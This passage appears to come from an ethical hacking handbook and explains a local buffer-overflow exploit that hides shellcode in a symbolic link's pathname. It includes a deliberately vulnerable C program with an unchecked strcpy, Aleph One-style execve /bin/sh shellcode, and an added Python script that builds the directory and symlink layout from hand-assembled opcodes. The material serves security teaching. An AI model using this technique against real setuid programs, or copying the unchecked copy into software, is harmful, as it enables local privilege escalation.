This makes it easy to compute a return address that will land in the pathname every
time. The key to making this work is getting shellcode into the pathname, which you can
only do in a local exploit. The trick is to create a symbolic link to the program to be
exploited and embed your shellcode in the name of the symbolic link. Two bytes complicate
this: a NUL cannot appear in a pathname at all, so the shellcode must be NUL-free, and a /
is a directory separator, which you can work around with creative use of mkdir (the bytes
before the / become a directory name, the bytes after it a file inside that directory).
Here is an example that creates a symbolic link to a simple exploitable program,
vulnerable.c (listed next):
# cat vulnerable.c
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
    char buf[16];
    /* print where main's frame sits so a return address can be computed */
    printf("main's stack frame is at: %08lX\n", (unsigned long)&argc);
    strcpy(buf, argv[1]);   /* unchecked copy: the overflow the exploit relies on */
    return 0;
}
# gcc -o /tmp/vulnerable vulnerable.c
To exploit this program, you will create a symbolic link to vulnerable that contains a
variant of the classic Aleph One shellcode as listed next:
; nq_aleph.asm
; assemble with: nasm -f bin nq_aleph.asm
USE32
_start:
jmp short bottom ; learn where we are
top:
pop esi ; address of /bin/sh
xor eax, eax ; clear eax
push eax ; push a NULL
mov edx, esp ; envp {NULL}
push esi ; push address of /bin/sh
mov ecx, esp ; argv {"/bin/sh", NULL}
mov al, 0xb ; execve syscall number into al
mov ebx, esi ; pointer to "/bin/sh"
int 0x80 ; do it!
bottom:
call top ; address of /bin/sh pushed
; db '/bin/sh' ; not assembled, we will add this later
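The layout step described above (NUL-free shellcode, each / turned into a directory with mkdir, and a symlink whose name carries the rest) as an added Python example; this is not the book's nq_aleph Perl script. It assumes Linux, where a pathname is raw bytes with only NUL and / special, and the opcode bytes are my hand assembly of the nq_aleph.asm listing with the deferred /bin/sh appended. For the round-trip check it points the symlink at /bin/cat instead of /tmp/vulnerable so the process can print its own argv[0] from /proc/self/cmdline.

```python
#!/usr/bin/env python3
"""Lay out shellcode as a pathname: a directory for every '/'-separated piece,
then a symlink whose relative path is byte-for-byte the shellcode.

Added example, not the book's nq_aleph script. Assumes Linux (pathnames are
raw bytes; only NUL and '/' are special). NQ_ALEPH is a hand assembly of the
nq_aleph.asm listing, as `nasm -f bin` would emit it."""
import os
import subprocess
import tempfile

# The NUL that terminates "/bin/sh" comes for free: the loader NUL-terminates
# argv[0] on the stack, which is exactly where this string ends up.
NQ_ALEPH = (
    b"\xeb\x0f"              #         jmp short bottom
    b"\x5e"                  # top:    pop esi        ; esi -> "/bin/sh"
    b"\x31\xc0"              #         xor eax, eax
    b"\x50"                  #         push eax       ; NULL
    b"\x89\xe2"              #         mov edx, esp   ; envp = {NULL}
    b"\x56"                  #         push esi
    b"\x89\xe1"              #         mov ecx, esp   ; argv = {"/bin/sh", NULL}
    b"\xb0\x0b"              #         mov al, 0xb    ; __NR_execve
    b"\x89\xf3"              #         mov ebx, esi   ; filename
    b"\xcd\x80"              #         int 0x80
    b"\xe8\xec\xff\xff\xff"  # bottom: call top       ; pushes &"/bin/sh"
    b"/bin/sh"               # appended here instead of in the .asm
)


def plan_layout(code):
    """Return (dirs, link): directory components to mkdir, and the final name.

    Rejects what cannot be expressed as a relative pathname: a NUL byte, a
    leading '/' (argv[0] would be absolute), a trailing '/', and '.' or '..'
    components. An empty middle component ("//") needs no directory: path
    resolution collapses repeated slashes while argv[0] keeps them."""
    if b"\x00" in code:
        raise ValueError("NUL at offset %d cannot be in a pathname" % code.index(b"\x00"))
    parts = code.split(b"/")
    if parts[0] == b"":
        raise ValueError("shellcode starting with '/' would need an absolute path")
    link = parts[-1]
    if link in (b"", b".", b".."):
        raise ValueError("shellcode must not end in '/', '/.' or '/..'")
    if any(p in (b".", b"..") for p in parts[:-1]):
        raise ValueError("'.' and '..' components are not handled here")
    return parts[:-1], link


def build_layout(code, target, base):
    """Create the directory chain and the symlink to target under base.

    Returns the relative path to exec from base; it equals code, so the victim
    sees argv[0] == code at a predictable place near the top of its stack."""
    dirs, _ = plan_layout(code)
    cur = os.fsencode(base)
    for d in dirs:
        if d == b"":          # "//": nothing to create
            continue
        cur = os.path.join(cur, d)
        os.mkdir(cur)
    os.symlink(os.fsencode(target), os.fsencode(base) + b"/" + code)
    return code


def layout_is_valid(base, code, target):
    """True when base/<code> is a symlink pointing at target."""
    path = os.fsencode(base) + b"/" + code
    return os.path.islink(path) and os.readlink(path) == os.fsencode(target)


def argv0_roundtrip(base, code):
    """Exec the symlink (expected to point at /bin/cat) on /proc/self/cmdline and
    return the argv[0] the new process saw; None where that is unavailable."""
    if not (os.path.exists("/proc/self/cmdline") and os.path.exists("/bin/cat")):
        return None
    out = subprocess.run([code, b"/proc/self/cmdline"], cwd=base,
                         stdout=subprocess.PIPE, check=True).stdout
    return out.split(b"\x00")[0]


def make_scratch_dir():
    """Fresh empty directory to build the layout in."""
    return tempfile.mkdtemp(prefix="nq_aleph_")


if __name__ == "__main__":
    base = make_scratch_dir()
    dirs, link = plan_layout(NQ_ALEPH)
    print("mkdir chain:", dirs, "symlink name:", link)
    build_layout(NQ_ALEPH, "/bin/cat", base)   # /tmp/vulnerable in the real attack
    print("argv[0] seen by the target:", argv0_roundtrip(base, NQ_ALEPH))
```

For this shellcode the only slashes are the two inside /bin/sh, so the layout is one directory named by the 22 opcode bytes, a bin directory inside it, and a symlink named sh; running it as <opcodes>/bin/sh puts the whole string, NUL-terminated, at the top of the victim's stack.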
Gray Hat Hacking: The Ethical Hacker's Handbook
472
You start with a Perl script named nq_aleph.